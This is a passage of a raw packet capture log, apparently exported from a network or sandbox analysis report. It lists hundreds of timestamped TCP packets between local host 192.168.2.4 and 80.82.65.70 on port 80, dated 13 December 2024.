                                          Dec 13, 2024 08:36:35.166644096 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.167289972 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.167330980 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.167445898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.167485952 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.168178082 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.168215036 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.168279886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.168315887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.169189930 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.169348955 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.169385910 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.169991970 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.170031071 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.170057058 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.170097113 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.170878887 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.170917988 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.170979023 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.171017885 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.171750069 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.171788931 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.171850920 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.171891928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.172672033 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.172712088 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.172732115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.172769070 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.173582077 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.173623085 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.173645973 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.173688889 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.174454927 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.174571991 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.174608946 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.175388098 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.175437927 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.175477028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.175513983 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.176254988 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.176296949 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.176429033 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.176465988 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.177263021 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.177287102 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.177325010 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.178608894 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.178627968 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.178653002 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.178673029 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.178930998 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.179027081 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.179064989 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.179836035 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.179874897 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.179917097 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.179964066 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.180740118 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.180912018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.180949926 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.181602955 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.181642056 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.181745052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.181780100 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.182492971 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.182552099 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.182564974 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.182605028 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.183456898 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.183496952 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.183499098 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.183540106 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.184336901 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.184376001 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.184418917 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.184458017 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.185359955 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.185476065 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.185512066 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.186106920 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.186168909 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.186232090 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.186268091 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.187030077 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.187068939 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.187136889 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.187175035 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.187912941 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.187951088 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.187966108 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.188003063 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.188785076 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.188893080 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.188930988 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.189641953 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.189682961 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.189774990 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.189811945 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.190547943 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.190586090 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.190649986 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.190686941 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.191447020 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.191485882 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.191557884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.191597939 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.192369938 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.192585945 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.192635059 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.193233967 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.193280935 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.193330050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.193371058 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.194116116 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.194159985 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.194245100 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.194286108 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.195004940 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.195054054 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.195121050 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.195161104 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.195905924 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.195951939 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.196027040 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.196068048 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.196830034 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.196916103 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.196970940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.197693110 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.197745085 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.197773933 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.197813988 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.281280041 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.281302929 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.281333923 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.281368971 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.281482935 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.281514883 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.281548023 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.281662941 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.282423019 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.282577991 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.282579899 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.282627106 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.283283949 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.283329010 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.283390045 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.283432007 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.346565962 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.346630096 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.346767902 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.346815109 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.346880913 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.346935987 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.347259998 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.347309113 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.347790956 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.347845078 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.347940922 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.347982883 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.348717928 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.348767042 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.348819017 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.348862886 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.349543095 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.349592924 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.349737883 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.349781990 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.350442886 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.350501060 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.350635052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.350893974 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.351355076 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.351404905 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.351779938 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.351826906 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.352236032 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.352293968 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.352332115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.352371931 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.353149891 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.353213072 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.353318930 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.353426933 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.354105949 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.354151011 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.354208946 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.354258060 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.354964018 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.355025053 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.355123997 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.355201006 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.355797052 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.355845928 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.355922937 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.355969906 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.356775045 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.356823921 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.356825113 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.356868029 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.357605934 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.357661009 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.357876062 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.357923985 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.358504057 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.358577013 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.358607054 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.358676910 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.359404087 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.359452963 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.359453917 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.359494925 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.360290051 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.360408068 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.360456944 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.361212015 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.361255884 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.361310005 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.361349106 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.362091064 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.362133026 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.362190008 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.362302065 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.362962961 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.363013983 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.363028049 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.363065004 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.363892078 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.363940001 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.363972902 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.364016056 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.364742041 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.365005970 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.365053892 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.365645885 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.365695000 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.365751028 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.365796089 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.366544962 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.366677999 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.366697073 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.366767883 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.367422104 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.367464066 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.367518902 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.367598057 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.368333101 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.368375063 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.368433952 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.368474960 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.369330883 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.369395971 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.369442940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.369442940 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.370170116 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.370230913 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.370317936 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.370385885 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.371094942 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.371114016 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.371169090 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.371169090 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.371929884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.371977091 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.372046947 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.372090101 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.372797966 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.372857094 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.372915030 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.372956038 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.373815060 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.373857975 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.373862982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.373895884 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.374605894 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.374641895 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.374752045 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.374912024 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.375502110 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.375556946 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.375593901 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.376380920 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.376465082 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.376473904 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.376513004 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.377290964 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.377331972 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.377477884 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.377521038 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.378240108 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.378252983 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.378287077 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.379054070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.379129887 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.379153013 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.379192114 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.379992962 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.380063057 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.380101919 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.380143881 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.380863905 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.380912066 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.381012917 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.381052017 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.381818056 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.381861925 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.381951094 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.382026911 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.382883072 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.382941008 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.383021116 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.383106947 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.383719921 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.383784056 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.383929014 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.384073973 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.384557009 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.384692907 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.384701014 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.384743929 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.385422945 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.385459900 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.385481119 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.385499954 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.386260033 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.386324883 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.386356115 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.386395931 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.387175083 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.387242079 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.387274027 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.387326002 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.388015032 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.388144016 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.388184071 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.388890982 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.389003038 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.389091015 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.389141083 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.389863968 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.389915943 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.389971972 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.390012026 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.473273993 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.473401070 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.473472118 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.473527908 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.473572969 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.473681927 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.473728895 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.474443913 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.474489927 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.474564075 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.474605083 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.475289106 CET804977280.82.65.70192.168.2.4
                                          Dec 13, 2024 08:36:35.475337029 CET4977280192.168.2.480.82.65.70
                                          Dec 13, 2024 08:36:35.475368023 CET804977280.82.65.70192.168.2.4
